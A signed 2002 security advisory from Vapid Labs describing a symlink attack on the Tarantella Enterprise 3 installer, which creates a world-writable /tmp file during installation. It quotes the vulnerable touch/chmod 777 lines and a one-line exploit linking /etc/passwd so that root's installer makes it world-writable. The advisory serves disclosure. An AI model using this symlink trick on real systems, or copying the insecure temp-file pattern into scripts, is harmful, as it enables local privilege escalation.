Another local root vulnerability during installation of Tarantella Enterprise 3.

["Larry W. Cashdollar" <lwc () vapid dhs org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                        Larry W. Cashdollar
                            Vapid Labs
                            2/18/2002


Another local root vulnerability during installation of Tarantella
Enterprise 3.


During installation a "twirling / \ | - " text graphic is displayed (you
remember them from the shareware games in DOS days..)  they create a file
in /tmp called spinning to determine at what state the installation is at.
The files permissions are changed toread write excute for all, removed and
recreated during different stages of the installation.  It is vulnerabile to
a simple symlink attack.

Problem Code:
<----snip---->
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1
<----snip---->

Exploit:
There is no race condition here, just create the link.

[lwc@misery] ln -s /etc/passwd  /tmp/spinning

Wait until root is done installing...

[lwc@misery] ls -l /etc/passwd
- -rwxrwxrwx    1 root     root         1094 Feb 18 22:39 /etc/passwd


Recommendations:
I again recommend the target system is running in single user mode before this
software is installed.


The vendor has been notified and plans to fix this in the next release.



http://vapid.dhs.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8clFP1hSQ6Gxh/KoRAtQWAKCOod+43+rYbvc0pmw2ZnPZ5pDsqwCcD18m
w80GBUP5ejW31415uXSVmGg=
=U3gs
-----END PGP SIGNATURE-----